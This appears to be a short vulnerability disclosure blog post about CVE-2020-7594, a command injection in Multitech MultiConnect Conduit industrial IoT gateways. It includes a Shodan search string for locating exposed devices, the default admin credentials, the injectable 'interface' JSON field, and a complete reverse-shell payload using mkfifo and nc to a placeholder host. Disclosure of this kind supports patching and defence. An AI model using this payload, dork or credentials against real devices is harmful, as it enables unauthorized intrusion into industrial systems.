Monday, January 20, 2020

[Multitech] Authenticated Remote Code Execution in MultiConnect Conduit devices


[Multitech] MultiConnect Conduit

CVE-2020-7594



Multitech Conduit is a configurable, scalable cellular communications gateway for industrial IoT applications, and using a web platform function it's possible to execute remote code due to poor sanitization of a parameter.


Shodan Dork: title:"MultiConnect® Conduit"

Proof of Concept



By default, the credentials of this platform are Username: admin and Password: admin


After logging in, we go to the debug options:

                   Administration > Debug Options



We enter an IP within the Ping section, and then execute the function.


As we can see, a payload is sent in json format with the IP address and network interface. In the "interface" field we can enter OS commands between semicolons (;).

Example: {"ip":"8.8.8.8","interface":";commands;"}

Unfortunately, the output of the executed commands cannot be displayed in the response. So, I created a simple script to send a reverse shell with the following payload:

{"ip":"1.1.1.1","interface":";rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <IP> <PORT> >/tmp/f;"}


We run the script and we got shell. :)





Tested on:
Firmware1.4.17-ocea-13592

 
biz.